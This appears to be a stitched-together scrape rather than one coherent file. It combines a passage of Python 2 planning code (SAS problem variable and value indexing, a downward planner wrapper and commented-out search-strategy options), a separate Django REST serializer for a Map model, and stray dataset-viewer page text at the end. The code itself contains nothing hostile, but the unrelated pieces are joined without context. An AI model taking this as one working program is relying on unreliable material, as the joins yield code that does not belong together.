        self.var_indices = {}      # var -> position in var_order
        self.var_order = []        # variables in first-seen order
        self.var_val_indices = {}  # var -> {val -> position in var_val_order[var]}
        self.var_val_order = {}    # var -> values in first-seen order
        self.axioms = axioms
        self.mutexes = []
        # presumably toggles action-cost output — confirm against write_sas
        self.costs = True
        self.initial = initial
        for var, val in initial.values.iteritems():
            self.add_val(var, val)
        self.goal = goal
        for var, val in goal.conditions.iteritems():
            self.add_val(var, val)
        self.actions = actions
        for action in self.actions:
            for var, val in action.conditions.iteritems():
                self.add_val(var, val)
            for var, val in action.effects.iteritems():
                self.add_val(var, val)

    def print_problem(self):
        # Debug dump of the variable/value tables (Python 2 print statements).
        print self.initial.values.keys()
        print len(self.initial.values)
        print len(self.var_order)
        print set(self.var_order) - set(self.initial.values.keys())
        for var in self.var_order:
            print var
            print self.var_val_order[var]
            print

    def add_var(self, var):
        # Register var once, seeding it with the default value at index 0.
        if var not in self.var_indices:
            self.var_indices[var] = len(self.var_order)
            self.var_order.append(var)
            self.var_val_indices[var] = {}
            self.var_val_order[var] = []
            self.add_val(var, self.default_val) # NOTE - I assume a default False value

    def add_val(self, var, val):
        # Ensure var exists, then register val if it has not been seen for var.
        self.add_var(var)
        if val not in self.var_val_indices[var]:
            self.var_val_indices[var][val] = len(self.var_val_order[var])
            self.var_val_order[var].append(val)

    def get_var(self, var):
        """Integer index of variable var."""
        return self.var_indices[var]

    def get_val(self, var, val):
        """Integer index of value val within variable var's domain."""
        return self.var_val_indices[var][val]

    def get_var_val(self, var, val):
        """(variable index, value index) pair for conditions/effects."""
        return self.get_var(var), self.get_val(var, val)
def downward_plan(initial, goal, operators):
    """Solve via the downward backend; returns (solution, elapsed seconds)."""
    start = time()
    sas_problem = Problem(initial, goal, operators, [])
    solution = solve_sas(sas_problem)
    return solution, time() - start
###########################################################################
# Search strategy selection: exactly one assignment below is active.
#default_search = default_plan
#default_search = lambda initial, goal, generator: bfs(initial, goal, generator, INF, INF, INF, INF, INF, None)
#default_search = lambda initial, goal, generator: a_star_search(initial, goal, generator,
#                                              lambda v: v.cost, False, INF, INF, INF, INF, INF, None)
#default_search = lambda initial, goal, generator: a_star_search(initial, goal, generator,
#                                              lambda v: v.cost + v.h_cost, True, INF, INF, INF, INF, INF, None)
#default_search = lambda initial, goal, generator: best_first_search(initial, goal, generator,
#                                              lambda v: v.h_cost, False, INF, INF, INF, INF, INF, None)
default_search = lambda initial, goal, generator: deferred_best_first_search(initial, goal, generator,
                                              lambda v: v.h_cost, False, INF, INF, INF, INF, INF, None) # True vs False can matter quite a bit
#default_search = lambda initial, goal, generator: semideferred_best_first_search(initial, goal, generator,
#                                              lambda v: v.h_cost, True, INF, INF, INF, INF, INF, None) # True vs False can matter quite a bit
#default_search = lambda initial, goal, generator: hill_climbing_search(initial, goal, generator,
#                                              None, 0, 1, False, INF, INF, INF, INF, INF, None)
def default_plan(initial, goal, operators):
    """Run the default search using the default successor generator."""
    generator = default_generator(initial, goal, operators)
    return default_search(initial, goal, generator)
def default_derived_plan(initial, goal, operators, axioms):
    """Plan with derived predicates: axioms are appended to the operator set."""
    # NOTE(review): passes a (callable, axioms) tuple where default_plan passes a
    # bare callable — confirm default_search accepts this pair for derived predicates.
    return default_search(initial, goal, (lambda v: iter([default_successors(v.state, goal, operators + axioms)]), axioms))
|
from rest_framework import serializers
from .models import Map
class MapSerializer(serializers.ModelSerializer):
    """Serializes Map model instances for the REST API."""

    class Meta:
        model = Map
        # Exposed fields; 'Tscore' keeps the model's capitalized attribute name.
        fields = ('id', 'name', 'size', 'category', 'broken', 'Tscore', 'valid', 'objects')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.